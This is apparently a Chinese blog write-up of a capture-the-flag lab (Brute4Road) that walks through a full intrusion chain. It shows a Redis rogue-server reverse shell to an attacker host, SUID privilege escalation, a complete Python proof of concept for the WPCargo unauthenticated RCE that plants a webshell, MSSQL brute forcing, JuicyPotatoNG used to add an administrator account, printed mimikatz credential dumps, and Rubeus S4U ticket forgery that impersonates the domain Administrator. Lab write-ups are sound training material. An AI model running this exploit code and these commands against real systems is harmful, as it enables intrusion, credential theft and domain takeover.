春秋云镜-Brute4Road

本文最后更新于 2025年9月6日晚上

Redis 主从复制，CVE-2021-25003，mssql，S4U 伪造

信息收集

fscan

扫到了几个东西，ftp 匿名登陆，Redis 未授权访问

1
2
3

[+] ftp 39.98.116.201:21:anonymous
   [->]pub
[+] Redis 39.98.116.201:6379 unauthorized file:/usr/local/redis/db/dump.rdb

ftp 匿名登陆

1 2	`ftp 39.98.116.201 anonymous:anonymous`

有一个 pub 文件目录，但里面什么都没有

Redis 主从复制 getshell

开放了 6379 端口，连接

1	`redis-cli -h 39.98.116.201`

准备写计划任务反弹 shell，但是没有权限

利用主从复制进行 getshell，**redis-rogue-serve**

1	`python3 redis-rogue-server.py --rhost 39.98.116.201 --rport 6379 --lhost IP --lport 7788 --exp exp.so`

反弹 shell，建立连接，在 /home/redis/flag 下找到了 flag01，但是没有权限读取

查看 SUID

1	`find / -user root -perm -4000 -print 2>/dev/null`

发现可以 base64 提权，不小心退出来了（已吸取教训，好好做权限维持了），上线 vshell

1	`base64 "flag01" \| base64 --decode`

1	`flag01: flag{07221d6f-5129-47f0-85ea-0c691642d351}`

CVE-2021-25003

上传 fscan 和 frp，ifconfig 知道内网 ip 为 172.22.2.7

[redis@centos-web01 tmp]$ ./FScan_2.0.1_linux_x64 -h 172.22.2.7/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.9s]     已选择服务扫描模式
[1.9s]     开始信息扫描
[1.9s]     CIDR范围: 172.22.2.0-172.22.2.255
[1.9s]     generate_ip_range_full
[1.9s]     解析CIDR 172.22.2.7/24 -> IP范围 172.22.2.0-172.22.2.255
[1.9s]     最终有效主机数量: 256
[1.9s]     开始主机扫描
[1.9s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s]     正在尝试无监听ICMP探测...
[1.9s]     ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[1.9s]     当前用户权限不足,无法发送ICMP包
[1.9s]     切换为PING方式探测...
[2.9s] [*] 目标 172.22.2.16     存活 (ICMP)
[3.0s] [*] 目标 172.22.2.18     存活 (ICMP)
[5.0s] [*] 目标 172.22.2.3      存活 (ICMP)
[5.0s] [*] 目标 172.22.2.34     存活 (ICMP)
[6.0s] [*] 目标 172.22.2.7      存活 (ICMP)
[7.9s]     存活主机数量: 5
[7.9s]     有效端口数量: 233
[7.9s] [*] 端口开放 172.22.2.16:80
[7.9s] [*] 端口开放 172.22.2.16:1433
[7.9s] [*] 端口开放 172.22.2.3:389
[7.9s] [*] 端口开放 172.22.2.3:445
[7.9s] [*] 端口开放 172.22.2.3:139
[7.9s] [*] 端口开放 172.22.2.3:135
[7.9s] [*] 端口开放 172.22.2.3:88
[7.9s] [*] 端口开放 172.22.2.16:445
[7.9s] [*] 端口开放 172.22.2.16:139
[7.9s] [*] 端口开放 172.22.2.16:135
[7.9s] [*] 端口开放 172.22.2.18:80
[7.9s] [*] 端口开放 172.22.2.18:22
[7.9s] [*] 端口开放 172.22.2.34:445
[7.9s] [*] 端口开放 172.22.2.34:139
[7.9s] [*] 端口开放 172.22.2.34:135
[7.9s] [*] 端口开放 172.22.2.18:139
[7.9s] [*] 端口开放 172.22.2.18:445
[7.9s] [*] 端口开放 172.22.2.7:6379
[7.9s] [*] 端口开放 172.22.2.7:80
[7.9s] [*] 端口开放 172.22.2.7:22
[7.9s] [*] 端口开放 172.22.2.7:21
[10.9s]     扫描完成, 发现 21 个开放端口
[10.9s]     存活端口数量: 21
[10.9s]     开始漏洞扫描
[11.0s] [*] 网站标题 http://172.22.2.7         状态码:200 长度:4833   标题:Welcome to CentOS
[11.0s] [+] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[11.0s] [*] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.34
[11.0s] [*] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.16
[11.0s] [*] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.3
[11.0s] [*] 网站标题 http://172.22.2.16        状态码:404 长度:315    标题:Not Found
[11.1s] [+] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[11.1s]     POC加载完成: 总共387个，成功387个，失败0个
[11.1s]     系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[11.1s] [+] NetBios 172.22.2.3      DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[11.1s]     系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[11.1s] [+] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[11.1s] [+] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[11.2s] [+] FTP服务 172.22.2.7:21 匿名登录成功!
[11.2s] [+] SMB认证成功 172.22.2.18:445 administrator:admin123
[11.4s]     SMB2共享信息 172.22.2.18:445 administrator Pass:P@ssword123 共享:[print$ IPC$]
[11.6s] [+] SMB认证成功 172.22.2.16:445 admin:admin123
[11.7s]     SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[11.8s]     SMB2共享信息 172.22.2.18:445 administrator Pass:root 共享:[print$ IPC$]
[11.8s]     SMB2共享信息 172.22.2.18:445 administrator Pass: 共享:[print$ IPC$]
[11.9s]     SMB2共享信息 172.22.2.18:445 administrator Pass:admin123 共享:[print$ IPC$]
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:root 共享:[ADMIN$ C$ fileshare IPC$]
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[12.1s]     SMB2共享信息 172.22.2.18:445 administrator Pass:admin 共享:[print$ IPC$]
[12.1s]     SMB2共享信息 172.22.2.18:445 administrator Pass:pass123 共享:[print$ IPC$]
[12.1s]     SMB2共享信息 172.22.2.18:445 administrator Pass:Password 共享:[print$ IPC$]
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:admin 共享:[ADMIN$ C$ fileshare IPC$]
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:admin123 共享:[ADMIN$ C$ fileshare IPC$]
[12.2s]     SMB2共享信息 172.22.2.16:445 admin Pass:pass123 共享:[ADMIN$ C$ fileshare IPC$]
[12.2s]     SMB2共享信息 172.22.2.16:445 admin Pass:pass@123 共享:[ADMIN$ C$ fileshare IPC$]
[12.2s]     SMB2共享信息 172.22.2.16:445 admin Pass:P@ssword123 共享:[ADMIN$ C$ fileshare IPC$]
[12.3s]     SMB2共享信息 172.22.2.18:445 administrator Pass:pass@123 共享:[print$ IPC$]
[12.3s]     SMB2共享信息 172.22.2.16:445 admin Pass:Password 共享:[ADMIN$ C$ fileshare IPC$]
[12.3s]     SMB2共享信息 172.22.2.16:445 admin Pass:password 共享:[ADMIN$ C$ fileshare IPC$]
[12.4s]     SMB2共享信息 172.22.2.18:445 administrator Pass:password 共享:[print$ IPC$]
[14.0s] [+] Redis 172.22.2.7:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[14.0s] [+] Redis无密码连接成功: 172.22.2.7:6379
[55.4s]     扫描已完成: 37/37

有以下资产

172.22.2.3		DC	
172.22.2.16		MSSQLSERVER	
172.22.2.18		UBUNTU-WEB02	
172.22.2.34		CLIENT01

先看 172.22.2.18 ，有 web 服务，用了 WordPress，wpscan 扫

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.22.2.18/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
 | Found By: Rss Generator (Passive Detection)
 |  - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
 |  - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>

[+] WordPress theme in use: twentytwentytwo
 | Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
 | [!] The version is out of date, the latest version is 2.0
 | Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
 | Style Name: Twenty Twenty-Two
 | Style URI: https://wordpress.org/themes/twentytwentytwo/
 | Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wpcargo
 | Location: http://172.22.2.18/wp-content/plugins/wpcargo/
 | Last Updated: 2025-07-23T01:11:00.000Z
 | [!] The version is out of date, the latest version is 8.0.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 6.x.x (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

WordPress 的插件 wpcargo 有问题，WPCargo < 6.9.0 - Unauthenticated RCE，找到 poc

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

蚁剑连接，在 wp-config.php 找到数据库的配置

1	`wpuser:WpuserEha8Fgj9`

1	`flag{c757e423-eb44-459c-9c63-7625009910d8}`

mssql 爆破

把 f1aagggghere 下的 S0meth1ng_y0u_m1ght_1ntereSted 数据导出来

里面有 id 和 password

对 172.22.2.16 进行爆破，拿到密码 ElGNkOiC

1	`sa:ElGNkOiC`

用蚁剑能连接上，但是没有数据，用 MDUT 连接，只有 mssqlserver 权限

直接添加用户不行的，查看特权

1	`whoami /priv`

发现开启了 SeImpersonatePrivilege 特权，那么就能想到可以用土豆提权，Windows 提权-SeImpersonatePrivilege 特权，上传到机器中

1	`C:\迅雷下载\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c whoami > C:\迅雷下载\butt3rf1y.txt" & type C:\迅雷下载\butt3rf1y.txt`

1
2
3

C:\迅雷下载\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c net user butt3rf1y butt3rf1y /add > C:\迅雷下载\butt3rf1y.txt" & type C:\迅雷下载\butt3rf1y.txt

C:\迅雷下载\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c net localgroup administrators butt3rf1y /add > C:\迅雷下载\butt3rf1y.txt" & type C:\迅雷下载\butt3rf1y.txt

1	`flag03: flag{44e05a29-8554-4b0a-85c6-ec3811ef6199}`

S4U 伪造权限 ST 拿下域控

minikatz 抓 hash

1 2	`privilege::debug sekurlsa::logonpasswords`

发现有域内用户 William 及其信息，但是登录不上去

Authentication Id : 0 ; 283669 (00000000:00045415)
Session           : Interactive from 1
User Name         : William
Domain            : XIAORANG
Logon Server      : DC
Logon Time        : 2025/8/13 17:49:06
SID               : S-1-5-21-2704639352-1689326099-2164665914-1106
        msv :
         [00000003] Primary
         * Username : William
         * Domain   : XIAORANG
         * NTLM     : 8853911fd59e8d0a82176e085a2157de
         * SHA1     : e4fd18cfd47b9a77836c82283fb560e6f465bc40
         * DPAPI    : da3fc187c1ff105853ec62c10cddd26b
        tspkg :
        wdigest :
         * Username : William
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : William
         * Domain   : XIAORANG.LAB
         * Password : Willg1UoO6Jt
        ssp :
        credman :

以及域内 MSSQLSERVER$ 用户

Authentication Id : 0 ; 8099440 (00000000:007b9670)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/8/13 20:19:01
SID               : S-1-5-90-0-4
        msv :
         [00000003] Primary
         * Username : MSSQLSERVER$
         * Domain   : XIAORANG
         * NTLM     : aca5ebbdd95f1c76b5d201c37d3d345b
         * SHA1     : 41ef4222b0a2dd8b549ec6b9fe8de87cd6eff68e
        tspkg :
        wdigest :
         * Username : MSSQLSERVER$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : MSSQLSERVER$
         * Domain   : xiaorang.lab
         * Password : 9a 5a 6d e6 da f8 de b8 91 89 0c f7 70 8d ec 42 05 c5 a0 5f c3 46 3b 37 bf 50 c9 2f 9e b0 94 dd 8a 06 8b 15 a2 e0 4d f9 e9 34 3d 3a eb ef 9c 53 6a a5 4a c9 2e 86 7f d7 92 6e 76 46 04 03 18 9d 8c 6f fd 7e d2 7b a6 34 b6 69 2b c1 cd 94 3e 95 69 4d ff ad 24 8b 15 e0 83 99 dc 4b 8d fd a5 d5 54 62 0c dd fc 9c 8e 8a 86 9f ad 91 8d 41 1f 9c 37 e0 86 db ff b7 c2 ae 81 68 ec 58 8e 64 01 cf 8d aa b5 45 96 2b 0c eb 76 72 01 57 03 26 54 2a 0a f7 38 cb da 8c 73 32 ac 12 c6 71 50 3c e9 7a 3e 46 3e 4e d8 75 d3 d4 b7 e4 23 8e 37 02 b5 68 a1 10 cc 7c f9 3c 37 b5 a1 3b 14 7c dc 81 64 9e 09 b5 85 22 85 b4 1b d9 4f f4 a9 e2 1a 57 25 1f f2 ad 7c ee da cd 2b 1a ab 76 ba 76 5a 3d 8e e9 ea c2 d3 8a 87 53 84 d6 4e 7e 55 6d 9e fe 36 e6
        ssp :
        credman :

dump 域信息并查看

1	`proxychains bloodhound-python -d XIAORANG.LAB -u 'MSSQLSERVER$' --hashes aca5ebbdd95f1c76b5d201c37d3d345b:aca5ebbdd95f1c76b5d201c37d3d345b -dc DC.XIAORANG.LAB -c all -ns 172.22.2.3 --dns-tcp --zip`

可以通过 S4U 伪造 ST 拿下域控，用 Rubeus 申请访问自身的服务票据，拿到票据，注入票据，一步到位

1	`.\Rubeus.exe s4u /user:MSSQLSERVER$ /rc4:aca5ebbdd95f1c76b5d201c37d3d345b /domain:xiaorang.lab /dc:DC.xiaorang.lab /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt`

进入域控目录，Windows 文件共享的 UNC 路径

1	`\\DC.xiaorang.lab\C$\Users\Administrator\flag`

1	`flag04: flag{126d2f61-43e0-42e7-b6ff-3f61946c3f67}`

渗透 > 靶机 > 春秋云镜

#Redis Wordpress S4U

春秋云镜-Brute4Road

http://example.com/2025/08/13/春秋云镜-Brute4Road/

作者

butt3rf1y

发布于

2025年8月13日

许可协议

2025年Solar应急响应公益月赛-8月上一篇

2025 第十届上海市大学生网络安全大赛暨"磐石行动"-初赛下一篇